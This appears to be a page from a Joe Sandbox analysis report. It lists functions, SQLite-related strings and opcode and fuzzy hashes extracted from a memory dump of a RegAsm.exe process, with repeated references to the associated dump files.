Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %.*s%s$%s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-894757972
Opcode ID: 16cb4b700df0ae55031983b73df77adf5f791686d2dacb2f23ba31f2799e63f0
Instruction ID: 22079ac5cfe9b1148b9725adaf1bb603981d3e10d67425246f8e430671f0ce5f
Opcode Fuzzy Hash: 16cb4b700df0ae55031983b73df77adf5f791686d2dacb2f23ba31f2799e63f0
Instruction Fuzzy Hash: 1B61D176A083518BD714CF24D880A9BBBE2AF84714F2A496DE8899B381D735F905CF91

Uniqueness

Uniqueness Score: -1.00%

Function 19C29DA0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

[%!g,%!g]], xrefs: 19C29EC0
[%!g,%!g],, xrefs: 19C29E7E

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: [%!g,%!g],$[%!g,%!g]]
API String ID: 0-3388633204
Opcode ID: 5be2e174cb3883d30435f43018000079a0d81afb6e2e6eeb06d7ea6bb4989c55
Instruction ID: a742e31ee87945d0f7d910a117e0d154249da8233131eb5f840c0027e79a924a
Opcode Fuzzy Hash: 5be2e174cb3883d30435f43018000079a0d81afb6e2e6eeb06d7ea6bb4989c55
Instruction Fuzzy Hash: 69514971900B019BD701DF29EDC4B97B7B4BF46380F488629F8899B290EB71E555CB93

Uniqueness

Uniqueness Score: -1.00%

Function 19C4F330 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 19C4F33F
malformed inverted index for FTS%d table %s.%s, xrefs: 19C4F3F3
unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 19C4F418

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
API String ID: 0-2809892521
Opcode ID: 886fe02682991a112dcc895d32b0a822e3cf2ef4bfbd3b29d78f8f089602f294
Instruction ID: e7a1e088c062c28e6213917dd604d824b6a68cea741edd95d3c278e11bf8c2cc
Opcode Fuzzy Hash: 886fe02682991a112dcc895d32b0a822e3cf2ef4bfbd3b29d78f8f089602f294
Instruction Fuzzy Hash: DF41D4B2E012A2DBD711EB35EC8CA5B37ACEF44255F184429FC89C7280DB319555CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 19C56E30 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 30COMMON

Download Yara Rule

Strings

invalid, xrefs: 19C56E47
%s at line %d of [%.10s], xrefs: 19C56E67
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C56E58
API call with %s database connection pointer, xrefs: 19C56E4C
misuse, xrefs: 19C56E62

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse
API String ID: 0-3670841456
Opcode ID: 75c31800b5a05f084e5d7620f8454b99467017ef39941ce2109dd4eee34b1858
Instruction ID: c00075d6ddf1be47cd7083587714576c7adde716230b6ec2a2e9c6867aaa3ea5
Opcode Fuzzy Hash: 75c31800b5a05f084e5d7620f8454b99467017ef39941ce2109dd4eee34b1858
Instruction Fuzzy Hash: C2F02B35F45184ABFB04D214FE81FE97B662B80B47FDC905CE2D2AF2C6C29A84439745

Uniqueness

Uniqueness Score: -1.00%

Function 19C56EB0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 29COMMON

Download Yara Rule

Strings

invalid, xrefs: 19C56ECA
%s at line %d of [%.10s], xrefs: 19C56EEA
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C56EDB
API call with %s database connection pointer, xrefs: 19C56ECF
misuse, xrefs: 19C56EE5

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse
API String ID: 0-3670841456
Opcode ID: ad404c2b2cdde90b476b1b0e62b70402337d46d9618dfad6fe6e9453c955026d
Instruction ID: 175fe01d1797a31cec7486477c75e62b9333da9730ab27fb5c0a133ddb9319a1
Opcode Fuzzy Hash: ad404c2b2cdde90b476b1b0e62b70402337d46d9618dfad6fe6e9453c955026d
Instruction Fuzzy Hash: 62F02B31F045C4AFFB108210FE61FE67A951780703FDCA0A4F2D29F6E2E958D4404240

Uniqueness

Uniqueness Score: -1.00%

Function 19C430F0 Relevance: 12.2, APIs: 8, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33278f961730cd6a919dd791e6de9709b505bfdaac96574d58dd108cd8a976d0
Instruction ID: dd30efd03625b25066bd4370e9afed7380d273839d05dca19e79ca425f53c7be
Opcode Fuzzy Hash: 33278f961730cd6a919dd791e6de9709b505bfdaac96574d58dd108cd8a976d0
Instruction Fuzzy Hash: E2518476608200AFDB41EB64FC04E9A7BE2EFC5320F1985A4F198871B2E731DD519B52

Uniqueness

Uniqueness Score: -1.00%

Function 19C3B6E0 Relevance: 12.1, APIs: 8, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56c4c65c5eb6367e9c6972880e82fb0205d5aedce5dd0690d5172f0248b71d94
Instruction ID: 649fb858a294b4174d37e5ee41aa1f96ecaf56ff3395fc958d391a3e6d563385
Opcode Fuzzy Hash: 56c4c65c5eb6367e9c6972880e82fb0205d5aedce5dd0690d5172f0248b71d94
Instruction Fuzzy Hash: 011196FD8041007FD6049B24FC41E7B77A9EFD2600F8995A8F88987251EB36EA1597A2

Uniqueness

Uniqueness Score: -1.00%

Function 19C97920 Relevance: 10.8, APIs: 7, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction ID: ef4d8591a2f87a9d3894776ed569c548a19fc04c08c113d9091ee1a8c0039450
Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
Instruction Fuzzy Hash: 22B1CEB2A15302ABC704CF28DC81A5AB7E5FF88214F485539F989D3751EB35F9248BA1

Uniqueness

Uniqueness Score: -1.00%

Function 19C35930 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

simple, xrefs: 19C35A38, 19C35A84, 19C35A95, 19C35B27
CREATE TABLE x(input, token, start, end, position), xrefs: 19C35933
unknown tokenizer: %s, xrefs: 19C35B28

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
API String ID: 0-2679805236
Opcode ID: aac152be7181312e57eb0163bdf87eea0a09ac3cd6747c500ec64917b72e2596
Instruction ID: bb58548dd3fef47cf506583356caa31e19d2b6f8732da76d4b8787c3437b4212
Opcode Fuzzy Hash: aac152be7181312e57eb0163bdf87eea0a09ac3cd6747c500ec64917b72e2596
Instruction Fuzzy Hash: E171C5729043868FC700DF29EC84A5BB7E8FF94255F8D4529E88DD7281EB35EA05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 19D3F0E0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 216COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19D3F1EB, 19D3F32C
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D3F1DC, 19D3F31D
misuse, xrefs: 19D3F1E6, 19D3F327
unable to delete/modify user-function due to active statements, xrefs: 19D3F157, 19D3F298

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: 4ca4540a04201fdd678644c493a708e371a12221b60c711cb2b1b2f8416ef088
Instruction ID: f2b86c655caed8518d2149b43939350a56507a6789d8a717e8d817531d100b30
Opcode Fuzzy Hash: 4ca4540a04201fdd678644c493a708e371a12221b60c711cb2b1b2f8416ef088
Instruction Fuzzy Hash: E3618BF9600B09ABF3018B29DC45B977794AF41307FCC4168E89997EC2E7A5E25087A1

Uniqueness

Uniqueness Score: -1.00%

Function 19C509C2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

cannot UPDATE a subset of columns on fts5 contentless-delete table: %s, xrefs: 19C50B3B

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: cannot UPDATE a subset of columns on fts5 contentless-delete table: %s
API String ID: 0-2869280805
Opcode ID: e91f513d898fb987db7872cf2a0898b5c1286a6e9ba04a7f39273f0fdc7924e4
Instruction ID: 6d13cf1527ab3e1f889a0a99dc2e9e4d39f6a7f4f8806fe20cf8d79fe470c6d9
Opcode Fuzzy Hash: e91f513d898fb987db7872cf2a0898b5c1286a6e9ba04a7f39273f0fdc7924e4
Instruction Fuzzy Hash: 4441C17A7013019FE700EF58FC80966F3A4FF84225B08457AEA8AC7691E772E954C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 19C43F30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 169COMMON

Download Yara Rule

Strings

remove_diacritics=0, xrefs: 19C43FE1
tokenchars=, xrefs: 19C4406A
separators=, xrefs: 19C440A3
remove_diacritics=1, xrefs: 19C43FA2
remove_diacritics=2, xrefs: 19C44021

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
API String ID: 0-131617836
Opcode ID: c604f565f23d3faae80441602f294dd054cefdee6320ac14d8ae095899d07f8b
Instruction ID: d98cbdeb26a8b861dc9780c66547c520383eb0394300ac60d48f3f8449142bb1
Opcode Fuzzy Hash: c604f565f23d3faae80441602f294dd054cefdee6320ac14d8ae095899d07f8b
Instruction Fuzzy Hash: 1951F476B041828BE3008F14E841766F7F1BB92724FFC41A8E8C65B685DB32ED96CB51

Uniqueness

Uniqueness Score: -1.00%

Function 19C41120 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

rbu_memory, xrefs: 19C411F5
main, xrefs: 19C411A6

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: main$rbu_memory
API String ID: 0-3973752345
Opcode ID: d5fc503cc4c40fb5dca0a19285ea3fdf25d3ac6825091e8c6a0a3b864704a27c
Instruction ID: 80a3c598bf4f6dfec54e244eb969ff30c26aa7600b1e6adb6f1643a7bb12c786
Opcode Fuzzy Hash: d5fc503cc4c40fb5dca0a19285ea3fdf25d3ac6825091e8c6a0a3b864704a27c
Instruction Fuzzy Hash: 8C51D176B003019FDB10DF65E884B5BB7E8BBA4314F284029E8C9D7291EB35E905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 19C38C40 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156COMMON

Download Yara Rule

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 19C38D35
winAccess, xrefs: 19C38D60

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 0-1873940834
Opcode ID: e873e7f6dd5cf58f44b3d1bba53f84c0641cd87ff04d5569cf5bc29fd826af17
Instruction ID: c5b286e51e7f372f29789370de5f0b879f9aa802fec87cd2c9ad3182f111abe4
Opcode Fuzzy Hash: e873e7f6dd5cf58f44b3d1bba53f84c0641cd87ff04d5569cf5bc29fd826af17
Instruction Fuzzy Hash: 95412AB7D053439BE301EB34E88155BFBA5ABA5311FCD5929F8D6922D0E730D644C683

Uniqueness

Uniqueness Score: -1.00%

Function 19D49350 Relevance: 10.6, APIs: 7, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
